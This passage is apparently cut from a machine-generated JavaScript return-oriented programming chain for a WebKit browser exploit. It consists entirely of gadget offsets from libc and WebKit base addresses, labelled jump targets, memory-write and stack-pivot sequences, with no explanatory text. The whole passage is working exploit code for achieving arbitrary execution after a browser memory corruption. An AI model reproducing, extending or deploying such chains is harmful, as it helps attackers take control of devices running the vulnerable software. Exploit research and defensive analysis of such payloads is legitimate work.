libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4280:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4282:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+238272, //L4287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+238288, //L4288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+238224, //L4284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4284:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4285:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4286:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4287:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4288:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+238400, //L4289+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+238392, //L4289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4289:
db([0, 0]); // 0x0
set_gadgets([
ropchain+238416, //L4289+24
ropchain+239672, //L4283
libc_base+764760, //pop rsi
ropchain+238456, //L4290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4290:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4292:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+238576, //L4295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+238560, //L4293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+238752, //L4298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+238768, //L4299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+238720, //L4296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+238736, //L4297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4296:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4297:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4298:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4299:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+238928, //L4303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+238896, //L4301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+238912, //L4302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4300:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4301:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4302:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4303:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+239032, //L4305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+239016, //L4304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4305:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+239128, //L4307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4306:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4307:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4308:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+239232, //L4309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239248, //L4310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4309:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4310:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+239416, //L4312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239432, //L4313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+239400, //L4311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4311:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4312:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4313:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+239576, //L4316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239592, //L4317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+239544, //L4314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4314:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4315:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4316:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4317:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+239664, //L4318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4318:
db([0, 0]); // 0x0
//L4283:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+239792, //L4321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239808, //L4322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+239776, //L4320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4320:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4321:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4322:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+239920, //L4324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+239968, //L4327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+239936, //L4325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4324:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4325:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4326:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4327:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+240080, //L4328+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+240072, //L4328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4328:
db([0, 0]); // 0x0
set_gadgets([
ropchain+240096, //L4328+24
ropchain+240664, //L4323
libc_base+764760, //pop rsi
ropchain+240136, //L4329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4329:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4331:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+240256, //L4334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240240, //L4332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4332:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4334:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+240400, //L4337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240368, //L4335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+240384, //L4336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4335:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4336:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4337:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+240488, //L4339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4338:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L4339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+240544, //L4340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4340:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4342:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+240624, //L4344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4344:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L4323:
//L4255:
libc_base+764760, //pop rsi
ropchain+240704, //L4345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4345:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4347:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+240824, //L4350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240808, //L4348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4348:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4350:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+241000, //L4353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241016, //L4354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+240968, //L4351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+240984, //L4352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4351:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4352:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4353:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4354:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+241176, //L4358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+241144, //L4356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+241160, //L4357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4355:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4356:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4357:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+241280, //L4360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+241264, //L4359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4359:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4360:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+241376, //L4362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4361:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4362:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4363:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+241480, //L4364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241496, //L4365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4364:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4365:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+241664, //L4367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241680, //L4368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+241648, //L4366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4366:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4367:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4368:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+241840, //L4373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+241856, //L4374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+241792, //L4370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4370:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4371:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4372:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4373:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4374:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+241968, //L4375+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+241960, //L4375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4375:
db([0, 0]); // 0x0
set_gadgets([
ropchain+241984, //L4375+24
ropchain+243336, //L4369
libc_base+764760, //pop rsi
ropchain+242024, //L4376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4376:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4378:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+242144, //L4381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+242128, //L4379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4379:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4381:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+242320, //L4384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+242336, //L4385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+242288, //L4382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+242304, //L4383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4382:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4383:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4384:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4385:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+242432, //L4387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+242416, //L4386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4386:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4387:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4388:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4389:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L4390:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+242632, //L4392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4392:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+242688, //L4393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4393:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+242824, //L4397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+242808, //L4396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4395:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4397:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+242944, //L4400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+242912, //L4398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4398:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4400:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+243080, //L4402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243096, //L4403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+243064, //L4401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4401:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4403:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+243240, //L4406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243256, //L4407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+243208, //L4404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4404:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4405:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4406:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4407:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+243328, //L4408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4408:
db([0, 0]); // 0x0
//L4369:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+243456, //L4411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243472, //L4412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+243440, //L4410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4410:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4411:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4412:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+243632, //L4417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+243648, //L4418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+243584, //L4414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4415:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4416:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4417:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4418:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+243760, //L4419+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+243752, //L4419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4419:
db([0, 0]); // 0x0
set_gadgets([
ropchain+243776, //L4419+24
ropchain+244728, //L4413
libc_base+764760, //pop rsi
ropchain+243816, //L4420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4420:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4422:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+243936, //L4425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+243920, //L4423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4423:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4425:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+244080, //L4428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+244048, //L4426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+244064, //L4427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4426:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4427:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4428:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
